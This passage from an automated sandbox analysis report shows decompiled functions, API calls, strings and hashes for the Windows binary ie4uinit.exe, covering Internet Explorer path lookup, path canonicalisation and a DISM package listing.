Part of subcall function 00007FF7319C5BBC: GetLastError.KERNEL32 ref: 00007FF7319C5D60
Part of subcall function 00007FF7319C5BBC: CloseHandle.KERNEL32 ref: 00007FF7319C5E03

Strings

In CmdAdminScavengeSystem, xrefs: 00007FF7319C2ADB
"%windir%\System32\dism.exe" /online /get-packages /format:table /english, xrefs: 00007FF7319C2B44
SCS, xrefs: 00007FF7319C2B19
Total Packages Removed from the system: %1!u!, xrefs: 00007FF7319C2BA1

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: FileHandleProcess$CreateCurrentMessageTemp$CloseDeleteDuplicateEnvironmentErrorExpandFormatLastLocalNameObjectPathPostSingleStringsThreadTimeWait_wfopen_smemset
String ID: "%windir%\System32\dism.exe" /online /get-packages /format:table /english$In CmdAdminScavengeSystem$SCS$Total Packages Removed from the system: %1!u!
API String ID: 3254253212-3963655054
Opcode ID: 6a3ee8069315a1fba1b2890442ed31be587dae658c57c72c301007f5a2cb6bf4
Instruction ID: 79c09d3c03e5da2adada59e5a8aca3b539f44a3e3e9fdb8514235545365bf1c0
Opcode Fuzzy Hash: 6a3ee8069315a1fba1b2890442ed31be587dae658c57c72c301007f5a2cb6bf4
Instruction Fuzzy Hash: 44211C61F2C9C2B1FB20BB14E8502F6A360FF44748FC05036D5CD465A9DEACE548EB60

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319C4968 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 39registrylibraryloaderCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(00007FF7319C25CC), ref: 00007FF7319C4995
RegCloseKey.ADVAPI32 ref: 00007FF7319C49A4
LoadLibraryExW.KERNEL32 ref: 00007FF7319C49B9
GetProcAddress.KERNEL32 ref: 00007FF7319C49D1
FreeLibrary.KERNEL32 ref: 00007FF7319C49FE

Strings

ieframe.dll, xrefs: 00007FF7319C49AC
ForceAssoc, xrefs: 00007FF7319C49DC
DllInstall, xrefs: 00007FF7319C49C7
Software\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE, xrefs: 00007FF7319C498B

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: Library$AddressCloseFreeLoadOpenProc
String ID: DllInstall$ForceAssoc$Software\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE$ieframe.dll
API String ID: 2856891894-1005996673
Opcode ID: 89a1f1639d63ee311428ec0d86141fdaea0159f5cc35476d97757c4880470a26
Instruction ID: 091334694cc758d712150eba0a9471188788ee63cc60deeae2d9a482d9835b8c
Opcode Fuzzy Hash: 89a1f1639d63ee311428ec0d86141fdaea0159f5cc35476d97757c4880470a26
Instruction Fuzzy Hash: F5113365F0CA82A1EB00AB15E844274A3A1BF84B99FC48135C99E067A8DEACD148D730

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319DC0C8 Relevance: 15.1, APIs: 10, Instructions: 138COMMON

Download Yara Rule

APIs

GetFileSizeEx.KERNEL32 ref: 00007FF7319DC0E4
GetLastError.KERNEL32 ref: 00007FF7319DC0EE
GetLastError.KERNEL32 ref: 00007FF7319DC106
GetLastError.KERNEL32 ref: 00007FF7319DC249

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: ErrorLast$FileSize
String ID:
API String ID: 3064237074-0
Opcode ID: ecb35cecd513e8bc7582a89e6879561ead3e6182c737ef39ba1eb7f2e16f259f
Instruction ID: c3359bdf553b2c691c7854c75453dba6477174c696d0c55b3ad4872f54cfc26a
Opcode Fuzzy Hash: ecb35cecd513e8bc7582a89e6879561ead3e6182c737ef39ba1eb7f2e16f259f
Instruction Fuzzy Hash: FB51B373E086C2D7E760AB65E444369B3E1EB88758F908139DB4E83358DF7CE445AB24

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319C8AEC Relevance: 14.4, APIs: 4, Strings: 4, Instructions: 425
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E00007FF77FF7319C8AEC(void* __edi, void* __esi, void* __rax, long long __rbx, signed int __rcx, void* __rdx, long long __r8, void* __r10, long long _a8, void* _a24, signed int _a32) {
				long long _v72;
				signed int _v80;
				char _v88;
				signed int _v96;
				intOrPtr _v104;
				signed int _v112;
				signed int _v120;
				intOrPtr _v136;
				long long _v144;
				long long _v152;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				short _t117;
				intOrPtr _t123;
				short _t124;
				signed int _t130;
				short _t139;
				signed int _t141;
				short _t143;
				void* _t229;
				void* _t253;
				signed int _t258;
				long long _t259;
				long long _t265;
				intOrPtr* _t269;
				signed long long _t271;
				signed long long _t273;
				void* _t274;
				signed int _t276;
				signed int* _t279;
				long long _t283;
				signed int _t285;
				signed int _t290;
				long long _t303;
				long long _t307;
				char _t308;
				void* _t314;
				signed int _t318;
				signed int _t319;
				void* _t320;
				intOrPtr* _t321;
				signed int _t322;
				short* _t324;
				signed int _t327;
				signed int _t328;
				intOrPtr* _t329;
				void* _t331;
				void* _t332;
				long long _t334;
				long long _t335;
				void* _t337;
				signed int _t356;
				short* _t360;
				short* _t362;
				intOrPtr* _t363;
				signed long long _t371;
				signed long long _t372;
				signed long long _t374;
				signed long long _t375;

				_t355 = __r10;
				_t253 = __rax;
				_a8 = __rbx;
				_a32 = r9d;
				_a24 = __r8;
				r12d = 0;
				_v120 = r12d;
				_t314 = __rdx;
				_t276 = __rcx;
				_t117 = E00007FF77FF7319C1310(__rcx, __rcx, __rdx, 0x319e8be4, __r10);
				r15d = _t117;
				if (_t117 < 0) goto 0x319c90d6;
				if (__rdx - 0x8000 <= 0) goto 0x319c8b4a;
				goto 0x319c90d6;
				_t279 =  &_v120;
				if (E00007FF77FF7319C8540(__rdx - 0x8000, _t279, __rdx) == 0) goto 0x319c8b40;
				r13d = _v120;
				if (_t314 - _t279 > 0) goto 0x319c8b69;
				r13d = r13d & 0xfffffff8;
				_v96 = _t356;
				_v80 = _t356;
				_a32 = r13d & 0x00000011;
				_v112 = _t356;
				asm("dec eax");
				_t334 =  <  ? _t314 : _t332 + _t279;
				_v88 = _t334;
				_t123 = E00007FF77FF7319C85EC(_t253, _t276, __r8,  &_v112, _t334);
				_v104 = _t123;
				if (_t123 == 0) goto 0x319c8c06;
				if ((r13d & 0x00000005) == 5) goto 0x319c8bec;
				if ((r13b & 0x00000010) != 0) goto 0x319c8bec;
				_v152 =  &_v88;
				_t124 = E00007FF77FF7319C6CD0(_t276, _t276, _t334, _t314, _t334, _t337, L"\\\\",  &_v96);
				r15d = _t124;
				goto 0x319c8cc6;
				_v80 = 6;
				_v152 =  &_v88;
				goto 0x319c8bcb;
				r8d = 4;
				_v96 = _t276;
				_t283 = __r8;
				__imp__wcsncmp();
				r14b = _t124 == 0;
				if (_t124 != 0) goto 0x319c8c5a;
				__imp__iswalpha();
				if (_t124 == 0) goto 0x319c8c55;
				if ( *((short*)(_a24 + 0xa)) != 0x3a) goto 0x319c8c55;
				goto 0x319c8c7d;
				r14b = 0;
				goto 0x319c8c7d;
				__imp__iswalpha();
				if (_t124 == 0) goto 0x319c8c7d;
				r14d = r14b & 0xffffffff;
				_t32 = _t283 + 1; // 0x1
				r14d =  ==  ? _t32 : r14d;
				if (r14b == 0) goto 0x319c8cc2;
				if ((r13d & 0x00000005) == 5) goto 0x319c8c92;
				if ((r13b & 0x00000010) == 0) goto 0x319c8cc2;
				_v80 = 4;
				_v152 =  &_v88;
				_t285 = _t276;
				r15d = E00007FF77FF7319C6CD0(_t276, _t285, _t334, _t276, _t334, _t337, L"\\\\?\\",  &_v96);
				_t130 = r13d & 0x00000005;
				_v112 = _t130;
				if (_t130 != 5) goto 0x319c8d1b;
				_t258 = _v80;
				if (_t258 == 0) goto 0x319c8d1b;
				_t259 = _t258 + 0x104;
				if (_t334 - _t259 > 0) goto 0x319c8d1b;
				_v80 = _t285;
				_v96 = _t276;
				_t360 = _a24;
				_t318 = _t276;
				_t335 =  >  ? _t259 : _t334;
				_v88 = _t335;
				_t303 = _t335;
				r15d = E00007FF77FF7319C1310(_t276, _t276, _t303, 0x319e8be4, __r10);
				if (r15d < 0) goto 0x319c8f51;
				if ( *_t360 == 0) goto 0x319c8f51;
				__imp__wcschr();
				_v72 = _t259;
				if (_t259 == 0) goto 0x319c8d59;
				goto 0x319c8d63;
				_t371 = (_t259 - _t360 >> 1) + 1;
				if ( *((intOrPtr*)(_t360 + _t371 * 2)) != 0) goto 0x319c8d59;
				if (_t371 - 0x100 <= 0) goto 0x319c8d75;
				if (_a32 == 0) goto 0x319c8f43;
				if (_t371 - 0x8000 >= 0) goto 0x319c8f43;
				if (_t371 != _t303) goto 0x319c8dde;
				if ( *_t360 != 0x2e) goto 0x319c8e92;
				if (_t259 == 0) goto 0x319c8da6;
				_t51 = _t259 + 2; // 0x2
				goto 0x319c8d1b;
				_t362 = _t51 + 2;
				if (_t318 - _t276 <= 0) goto 0x319c8d1b;
				if (E00007FF77FF7319C8678(0, _t259, _t276, _t276) != 0) goto 0x319c8d1b;
				_t319 = _t318 - 2;
				_v96 = _t319;
				_v88 = _v88 + 1;
				goto 0x319c8d0c;
				if (_t371 != 2) goto 0x319c8e80;
				if ( *_t362 != 0x2e) goto 0x319c8e92;
				if ( *((short*)(_t362 + 2)) != 0x2e) goto 0x319c8e92;
				if (_t319 - _t276 <= 0) goto 0x319c8e6e;
				_t290 = _t276;
				if (E00007FF77FF7319C8678(_t134, _t259, _t276, _t290) != 0) goto 0x319c8e6a;
				_t320 = _t319 + 0xfffffffe;
				if (_t276 - _t320 >= 0) goto 0x319c8e2e;
				_t56 = _t290 + 0x5c; // 0x5c
				_t321 = _t320 - 2;
				if ( *_t321 == _t56) goto 0x319c8e31;
				if (_t276 - _t321 < 0) goto 0x319c8e20;
				_t322 = _t290;
				_v96 = _t322;
				if (_t322 == 0) goto 0x319c8e4b;
				_t307 = _t335 - (_t322 - _t276 >> 1);
				goto 0x319c8e52;
				_v96 = _t276;
				_v88 = _t307;
				r15d = E00007FF77FF7319C1310(_t276, _t276, _t307, 0x319e8be4, __r10);
				goto 0x319c8e77;
				if (_v72 != 0) goto 0x319c8d9d;
				_t363 = _t362 + 4;
				goto 0x319c8d1b;
				if (_t371 != 0) goto 0x319c8e92;
				_t372 =  ==  ? _t307 : _t371;
				_t308 = _v88;
				_v136 = 0;
				_v144 =  &_v88;
				_t265 =  &_v96;
				_v152 = _t265;
				_t139 = E00007FF77FF7319C6DC8( *_t363 - _t371 + 0x5c, _t276, _t276, _t308, _t276, _t335, _t363, _t372, __r10);
				r15d = _t139;
				if (_t139 != 0x8007007a) goto 0x319c8f21;
				if (_t372 != _t308) goto 0x319c8f21;
				_t68 = _t308 + 0x5b; // 0x5c
				if ( *_t363 != _t68) goto 0x319c8f21;
				_t141 =  *(_t363 + 2) & 0x0000ffff;
				if (_t141 == 0) goto 0x319c8f2e;
				if (_t141 != 0x2e) goto 0x319c8ef3;
				if ( *((intOrPtr*)(_t363 + 4)) == 0) goto 0x319c8f2e;
				if (_v88 != _t308) goto 0x319c8f21;
				if (_t141 != 0x2e) goto 0x319c8f21;
				if ( *((intOrPtr*)(_t363 + 4)) != _t141) goto 0x319c8f21;
				_t324 = _v96;
				_v88 = _t265;
				r15d = 0;
				 *_t324 = 0;
				_v96 = _t324 + 2;
				goto 0x319c8f25;
				goto 0x319c8d1b;
				_t327 = _v96;
				r12d = 0;
				r15d = r12d;
				goto 0x319c8f54;
				_t374 = _t372 | 0xffffffffffffffff;
				r15d = 0x800700ce;
				r12d = 0;
				if ((r13b & 0x00000020) == 0) goto 0x319c8f9c;
				if (_t327 - _t276 <= 0) goto 0x319c8f9c;
				if ( *((intOrPtr*)(_t327 - 2)) == _t374 + 0x5d) goto 0x319c8f9c;
				_v136 = r12d;
				_v144 =  &_v88;
				r9d = 1;
				_v152 =  &_v96;
				_t143 = E00007FF77FF7319C6DC8( *((intOrPtr*)(_t327 - 2)) - _t374 + 0x5d, _t276, _t327, _v88, _t327, _t335, "\\", _t372, __r10);
				_t328 = _v96;
				r15d = _t143;
				if (r15d >= 0) goto 0x319c8fe7;
				E00007FF77FF7319C1310(_t276, _t276, _t335, 0x319e8be4, _t355);
				_t229 = r15d - 0x8007007a;
				if (_t229 != 0) goto 0x319c8fdf;
				r13d = r13d & 0x00000001;
				if (_t229 != 0) goto 0x319c8fcb;
				if (_t335 == 0x104) goto 0x319c8fd9;
				if (r13d == 0) goto 0x319c8fdf;
				if (_t335 != 0x8000) goto 0x319c8fdf;
				r15d = 0x800700ce;
				goto 0x319c90d6;
				if ((r13b & 0x00000018) != 0) goto 0x319c905a;
				if (_t328 - _t276 <= 0) goto 0x319c9021;
				_t329 = _t328 + 0xfffffffe;
				if ( *_t329 != 0x2e) goto 0x319c9021;
				if (_t329 == _t276) goto 0x319c901d;
				_t269 = _t329 - 2;
				if ( *_t269 == 0x2a) goto 0x319c9021;
				 *_t329 = r12w;
				if ( *_t269 == 0x2e) goto 0x319c8fff;
				goto 0x319c9021;
				 *_t269 = r12w;
				_t271 = _t374 + 1;
				if ( *((intOrPtr*)(_t276 + _t271 * 2)) != r12w) goto 0x319c9024;
				_t331 = _t276 + _t271 * 2;
				if (_t331 - _t276 + 0xe < 0) goto 0x319c905a;
				r8d = 7;
				if (E00007FF77FF7319C93B0(_t276, _t331 - 0xe, L"::$DATA", _t372) == 0) goto 0x319c905a;
				 *((intOrPtr*)(_t331 - 0xe)) = r12w;
				_t273 = _v80;
				if (_t273 == 0) goto 0x319c90a3;
				if (_v112 != 5) goto 0x319c90a3;
				_t274 = _t276 + _t273 * 2;
				_t375 = _t374 + 1;
				if ( *((intOrPtr*)(_t274 + _t375 * 2)) != r12w) goto 0x319c906d;
				if (_t375 - 0x104 >= 0) goto 0x319c90a3;
				if (_v104 == r12d) goto 0x319c9094;
				goto 0x319c909e;
				E00007FF77FF7319C1310(_t276, _t276, _t335, _t276 + 8, _t355);
				if (_t335 - _t274 <= 0) goto 0x319c90b9;
				if ( *_t276 != r12w) goto 0x319c90b9;
				 *_t276 = 0x5c;
				if (_t335 - 3 <= 0) goto 0x319c90d4;
				if ( *((short*)(_t276 + 2)) != 0x3a) goto 0x319c90d4;
				if ( *((intOrPtr*)(_t276 + 4)) != r12w) goto 0x319c90d4;
				 *((intOrPtr*)(_t276 + 4)) = 0x5c;
				return 0;
			}

0x7ff7319c8aec
0x7ff7319c8aec
0x7ff7319c8aec
0x7ff7319c8af1
0x7ff7319c8af6
0x7ff7319c8b13
0x7ff7319c8b1d
0x7ff7319c8b21
0x7ff7319c8b24
0x7ff7319c8b27
0x7ff7319c8b2c
0x7ff7319c8b31
0x7ff7319c8b3e
0x7ff7319c8b45
0x7ff7319c8b4a
0x7ff7319c8b55
0x7ff7319c8b57
0x7ff7319c8b63
0x7ff7319c8b65
0x7ff7319c8b6c
0x7ff7319c8b73
0x7ff7319c8b77
0x7ff7319c8b80
0x7ff7319c8b84
0x7ff7319c8b96
0x7ff7319c8b9a
0x7ff7319c8b9e
0x7ff7319c8ba3
0x7ff7319c8ba8
0x7ff7319c8bb3
0x7ff7319c8bb9
0x7ff7319c8bbf
0x7ff7319c8bd5
0x7ff7319c8bde
0x7ff7319c8be7
0x7ff7319c8bf0
0x7ff7319c8bf8
0x7ff7319c8c04
0x7ff7319c8c06
0x7ff7319c8c0c
0x7ff7319c8c17
0x7ff7319c8c20
0x7ff7319c8c28
0x7ff7319c8c32
0x7ff7319c8c38
0x7ff7319c8c42
0x7ff7319c8c4d
0x7ff7319c8c53
0x7ff7319c8c55
0x7ff7319c8c58
0x7ff7319c8c5d
0x7ff7319c8c67
0x7ff7319c8c6d
0x7ff7319c8c76
0x7ff7319c8c79
0x7ff7319c8c80
0x7ff7319c8c8a
0x7ff7319c8c90
0x7ff7319c8c96
0x7ff7319c8c9e
0x7ff7319c8ca7
0x7ff7319c8cbd
0x7ff7319c8cc9
0x7ff7319c8ccc
0x7ff7319c8cd2
0x7ff7319c8cd4
0x7ff7319c8cdb
0x7ff7319c8cdd
0x7ff7319c8ce6
0x7ff7319c8ced
0x7ff7319c8cf4
0x7ff7319c8cf8
0x7ff7319c8cfb
0x7ff7319c8cfe
0x7ff7319c8d05
0x7ff7319c8d09
0x7ff7319c8d18
0x7ff7319c8d27
0x7ff7319c8d32
0x7ff7319c8d3d
0x7ff7319c8d45
0x7ff7319c8d4c
0x7ff7319c8d57
0x7ff7319c8d59
0x7ff7319c8d61
0x7ff7319c8d6a
0x7ff7319c8d6f
0x7ff7319c8d7c
0x7ff7319c8d8a
0x7ff7319c8d92
0x7ff7319c8d9b
0x7ff7319c8d9d
0x7ff7319c8da1
0x7ff7319c8da6
0x7ff7319c8dad
0x7ff7319c8dbd
0x7ff7319c8dc7
0x7ff7319c8dce
0x7ff7319c8dd2
0x7ff7319c8dd9
0x7ff7319c8de2
0x7ff7319c8dee
0x7ff7319c8dfb
0x7ff7319c8e04
0x7ff7319c8e06
0x7ff7319c8e12
0x7ff7319c8e14
0x7ff7319c8e1b
0x7ff7319c8e1d
0x7ff7319c8e20
0x7ff7319c8e27
0x7ff7319c8e2c
0x7ff7319c8e2e
0x7ff7319c8e31
0x7ff7319c8e3b
0x7ff7319c8e46
0x7ff7319c8e49
0x7ff7319c8e4e
0x7ff7319c8e59
0x7ff7319c8e65
0x7ff7319c8e68
0x7ff7319c8e71
0x7ff7319c8e77
0x7ff7319c8e7b
0x7ff7319c8e83
0x7ff7319c8e8e
0x7ff7319c8e92
0x7ff7319c8e9a
0x7ff7319c8ea1
0x7ff7319c8ea9
0x7ff7319c8eb0
0x7ff7319c8eb5
0x7ff7319c8eba
0x7ff7319c8ec2
0x7ff7319c8ecc
0x7ff7319c8ece
0x7ff7319c8ed6
0x7ff7319c8ed8
0x7ff7319c8ee3
0x7ff7319c8ee9
0x7ff7319c8ef1
0x7ff7319c8ef7
0x7ff7319c8efd
0x7ff7319c8f05
0x7ff7319c8f07
0x7ff7319c8f0d
0x7ff7319c8f11
0x7ff7319c8f14
0x7ff7319c8f1b
0x7ff7319c8f1f
0x7ff7319c8f29
0x7ff7319c8f2e
0x7ff7319c8f32
0x7ff7319c8f35
0x7ff7319c8f41
0x7ff7319c8f43
0x7ff7319c8f47
0x7ff7319c8f51
0x7ff7319c8f58
0x7ff7319c8f5d
0x7ff7319c8f63
0x7ff7319c8f6d
0x7ff7319c8f79
0x7ff7319c8f7e
0x7ff7319c8f8b
0x7ff7319c8f90
0x7ff7319c8f95
0x7ff7319c8f99
0x7ff7319c8f9f
0x7ff7319c8fae
0x7ff7319c8fb3
0x7ff7319c8fba
0x7ff7319c8fbc
0x7ff7319c8fc0
0x7ff7319c8fc9
0x7ff7319c8fce
0x7ff7319c8fd7
0x7ff7319c8fd9
0x7ff7319c8fe2
0x7ff7319c8feb
0x7ff7319c8ff0
0x7ff7319c8ff2
0x7ff7319c8ffa
0x7ff7319c9002
0x7ff7319c9004
0x7ff7319c900c
0x7ff7319c900e
0x7ff7319c9019
0x7ff7319c901b
0x7ff7319c901d
0x7ff7319c9024
0x7ff7319c902c
0x7ff7319c902e
0x7ff7319c9039
0x7ff7319c903b
0x7ff7319c9053
0x7ff7319c9055
0x7ff7319c905a
0x7ff7319c9061
0x7ff7319c9067
0x7ff7319c9069
0x7ff7319c906d
0x7ff7319c9075
0x7ff7319c907e
0x7ff7319c9084
0x7ff7319c9092
0x7ff7319c909e
0x7ff7319c90ab
0x7ff7319c90b1
0x7ff7319c90b3
0x7ff7319c90bd
0x7ff7319c90c4
0x7ff7319c90cb
0x7ff7319c90cd
0x7ff7319c90f0

APIs

wcschr.MSVCRT ref: 00007FF7319C8D3D

Strings

Software\Microsoft\Windows\CurrentVersion\Policies, xrefs: 00007FF7319C8B04
\\?\, xrefs: 00007FF7319C8C10, 00007FF7319C8CAA
\\?\UNC\, xrefs: 00007FF7319C8BFD
::$DATA, xrefs: 00007FF7319C9041

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: wcschr
String ID: ::$DATA$Software\Microsoft\Windows\CurrentVersion\Policies$\\?\$\\?\UNC\
API String ID: 1497570035-3817109965
Opcode ID: 3cbcbc159ef5ef15d30c2d2d0b0e9c040d7ffa2746ddc12a1ee377f093ca5bbf
Instruction ID: 8ec6cfed1c416ee8aae6eb95145cef252e3d3503f9559adb7fb243ce60472094
Opcode Fuzzy Hash: 3cbcbc159ef5ef15d30c2d2d0b0e9c040d7ffa2746ddc12a1ee377f093ca5bbf
Instruction Fuzzy Hash: 1B02C561F08682A4FB60AB61D5002BDA3B5BB047ACF844535CADD476DCDFBCE485EB60

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319C6680 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E00007FF77FF7319C6680(long long __rbx, void* __rcx, long long __rsi) {
				void* _t27;
				signed char _t34;
				void* _t41;
				void* _t43;
				signed long long _t56;
				WCHAR* _t74;
				void* _t77;
				long _t79;
				void* _t82;
				signed long long _t83;
				void* _t90;
				WCHAR* _t92;

				_t58 = __rbx;
				 *((long long*)(_t82 + 0x10)) = __rbx;
				 *((long long*)(_t82 + 0x20)) = __rsi;
				_t3 = _t82 - 0x180; // -430
				_t83 = _t82 - 0x280;
				_t56 =  *0x319f4658; // 0x8be7dd1f02a
				 *(_t3 + 0x170) = _t56 ^ _t83;
				_t41 = r8d;
				 *((intOrPtr*)(_t83 + 0x20)) = 0;
				_t77 = __rcx;
				GetCurrentProcess();
				__imp__IsWow64Process();
				_t7 = _t58 + 0x26; // 0x26
				r14d = _t7;
				if ( *((intOrPtr*)(_t83 + 0x20)) == 0) goto 0x319c6737;
				if (_t41 != r14d) goto 0x319c6737;
				r8d = 0x104;
				_t9 = _t83 + 0x60; // 0x32
				if (ExpandEnvironmentStringsW(_t92, _t74, _t79) - 1 - 0x103 > 0) goto 0x319c67af;
				_t10 = _t83 + 0x60; // 0x32
				if (E00007FF77FF7319C9348(_t43, _t56 ^ _t83, __rbx, _t10, _t9, __rcx, L"IEXPLORE.EXE", _t90) < 0) goto 0x319c67af;
				_t11 = _t83 + 0x60; // 0x32
				_t27 = E00007FF77FF7319C1310(_t58, _t77, _t9, _t11, _t90);
				if (_t27 < 0) goto 0x319c67af;
				_t12 = _t92 - 0x25; // 0x1
				_t34 = _t12;
				goto 0x319c67af;
				__imp__GetNativeSystemInfo();
				if ( *((intOrPtr*)(_t83 + 0x28)) != _t34) goto 0x319c6750;
				_t42 =  ==  ? r14d : _t41;
				r9d = 0;
				_t15 = _t83 + 0x60; // 0x32
				r8d =  ==  ? r14d : _t41;
				0x319e4040();
				if (_t27 == 0) goto 0x319c67af;
				_t16 = _t83 + 0x60; // 0x32
				if (E00007FF77FF7319C9348(_t43, _t56 ^ _t83, _t58, _t16, _t15, _t77, L"Internet Explorer\\", _t90) < 0) goto 0x319c67af;
				_t17 = _t83 + 0x60; // 0x32
				if (E00007FF77FF7319C9348(_t43, _t56 ^ _t83, _t58, _t17, _t15, _t77, L"IEXPLORE.EXE", _t90) < 0) goto 0x319c67af;
				_t18 = _t83 + 0x60; // 0x32
				E00007FF77FF7319C1310(_t58, _t77, _t15, _t18, _t90);
				_t36 =  >=  ? 1 : _t34 & 0x000000ff;
				_t31 =  >=  ? 1 : _t34 & 0x000000ff;
				return E00007FF77FF7319E38D0( >=  ? 1 : _t34 & 0x000000ff, 0,  *(_t3 + 0x170) ^ _t83);
			}

0x7ff7319c6680
0x7ff7319c6680
0x7ff7319c6685
0x7ff7319c668e
0x7ff7319c6696
0x7ff7319c669d
0x7ff7319c66a7
0x7ff7319c66b0
0x7ff7319c66b3
0x7ff7319c66b7
0x7ff7319c66ba
0x7ff7319c66c8
0x7ff7319c66ce
0x7ff7319c66ce
0x7ff7319c66d6
0x7ff7319c66db
0x7ff7319c66dd
0x7ff7319c66e3
0x7ff7319c66fc
0x7ff7319c6709
0x7ff7319c6715
0x7ff7319c671b
0x7ff7319c6728
0x7ff7319c672f
0x7ff7319c6731
0x7ff7319c6731
0x7ff7319c6735
0x7ff7319c673c
0x7ff7319c6747
0x7ff7319c674c
0x7ff7319c6750
0x7ff7319c6753
0x7ff7319c6758
0x7ff7319c675d
0x7ff7319c6764
0x7ff7319c676d
0x7ff7319c6779
0x7ff7319c6782
0x7ff7319c678e
0x7ff7319c6790
0x7ff7319c679d
0x7ff7319c67ac
0x7ff7319c67af
0x7ff7319c67d7

APIs

GetCurrentProcess.KERNEL32(?,?,00000000,00000003,?,00007FF7319C5355), ref: 00007FF7319C66BA
IsWow64Process.KERNEL32(?,?,00000000,00000003,?,00007FF7319C5355), ref: 00007FF7319C66C8
ExpandEnvironmentStringsW.KERNEL32(?,?,00000000,00000003,?,00007FF7319C5355), ref: 00007FF7319C66EF

Part of subcall function 00007FF7319C9348: wcsncmp.MSVCRT(?,?,?,?,00000000,00007FF7319DAC11), ref: 00007FF7319C9379

GetNativeSystemInfo.KERNEL32(?,?,00000000,00000003,?,00007FF7319C5355), ref: 00007FF7319C673C
SHGetSpecialFolderPathW.SHELL32(?,?,00000000,00000003,?,00007FF7319C5355), ref: 00007FF7319C675D

Strings

Internet Explorer\, xrefs: 00007FF7319C6766
%ProgramW6432%\Internet Explorer, xrefs: 00007FF7319C66E8
IEXPLORE.EXE, xrefs: 00007FF7319C6702, 00007FF7319C677B

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: Process$CurrentEnvironmentExpandFolderInfoNativePathSpecialStringsSystemWow64wcsncmp
String ID: %ProgramW6432%\Internet Explorer$IEXPLORE.EXE$Internet Explorer\
API String ID: 2223505443-224271814
Opcode ID: 9a9f1902cc74c873c43ded97c153d8c50a3f8b10980228495e4a4f7fccfb1f4c
Instruction ID: a58427d36d399f3bafb2044e05fe71b31ef957392e5cbf220ae43336dd014f6d
Opcode Fuzzy Hash: 9a9f1902cc74c873c43ded97c153d8c50a3f8b10980228495e4a4f7fccfb1f4c
Instruction Fuzzy Hash: 28312372E0C7C2A6EB10AB11E8501E9A365FB84748FC05435D9CD43A99EFBCE645DB34

Uniqueness

